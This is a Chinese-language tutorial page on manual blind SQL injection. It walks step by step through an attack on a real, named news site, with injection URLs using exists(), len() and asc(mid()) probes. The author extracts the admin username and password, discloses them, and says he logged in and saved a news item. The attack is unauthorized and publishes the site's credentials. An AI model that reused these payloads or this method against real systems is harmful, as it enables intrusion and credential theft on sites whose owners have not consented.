频道栏目
首页 > 资讯 > 网站安全 > 正文

最新手工注入教程

06-05-07        来源:[db:作者]  
收藏   我要投稿

哈,大家好,好久不玩这些东西了。最近看到一些人用别人的工具到处搞破坏,
灰客,白客都出来了。。。。我晕~~~~是不是还有花客,粉客什么的。。。其实
都是一些只会用别人工具的菜鸟,还敢开站来毒害青少年!强烈鄙视!好了,费
话不多说了,今天给大家做个手工注入的动画。大家见笑了。
http://www.sx165.com/xinwen/default.asp?cataid=3这个就是今天摧残的对象!

sql注入漏洞判断:                  
1=1返回正常页面,1=2时候报错。  [%20就是空格的解码]

好了,现在可以说明它存在漏洞!下面我们开始注入!

1。我先猜管理员ID,假设存在admin表名

http://www.sx165.com/xinwen/default.asp?cataid=3%20and%20exists(select%20id%20from%20admin%20where%20id%20=3)


这里id=3返回了正常页面,说明管理员存在id是3,也同时证明了我刚才猜解存在
admin这个表名

 

2。下面我开始猜解用户名,我假设存在user字段

这里len(user)>3,["len"就是长度也意思],返回正页面,证明我猜
解存在user字段正确,并且user字段的长度是大于3的!

http://www.sx165.com/xinwen/default.asp?cataid=3%20and%20exists(select%20user%20from%20admin%20where%20len(user)>3%20and%20id=3)

 


这里len(user)>4,返回错误页面!既然大于3又不大于4,那么它一定是等于4了!!!


http://www.sx165.com/xinwen/default.asp?cataid=3%20and%20exists(select%20user%20from%20admin%20where%20len(user)>4%20and%20id=3)

 

看!len(user)=4返回正常页面了吧!说明user字段长度是4!


http://www.sx165.com/xinwen/default.asp?cataid=3%20and%20exists(select%20user%20from%20admin%20where%20len(user)=4%20and%20id=3)

 

 

3.现在我开始破解user字段的值!


这里面涉及到mid函数,和ASC字符!

mid(字符值,字符开始位置,字串长度),比如:mid(thedaybefore,1,1)就是1,mid(thedaybefore,1,3)就是the

asc(***),“****”的内容便是asc码转换后的值!这里我们借助一个asc码转换的工具


http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(user,1,1))>119 and id=3)
返回正确页面

http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(user,1,1))>120 and id=3)
返回错误页面

所以asc码的值是120!下面通过工具进行转换


所以第一位用户名就是x,下面我们进行第2,3,4位的猜解!!!go on!


大于104,不大于105所以就是105啦!


所以第二位是i

 

大于109小于110,所以是110,ASC110=n

 

第三位是n


大于102,且不大于103,所以就是103,ASC103=g


哈哈!用户名已经全部猜解完成了!
xing


现在开始猜解密码!同理!大家复习一下!


现在可以肯定存在字段名pwd!下面就不打字了,大家看我操作吧!

 

密码位数:4

晕!在这里打吧,上面太乱了!
http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(pwd,1,1))>100 and id=3)

120,105,110,103


xing,晕!密码和用户名一样~~~~我服了那个网管了。。。。。

下面登陆上去看看!

新闻已经成功保存了...

哈哈,这个站大家就不要再搞了,管理员我已经通知了,好了,就到这里


 

相关TAG标签
上一篇:黑客常用的命令和快捷键
下一篇:SQL Server 2005常见缩写
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站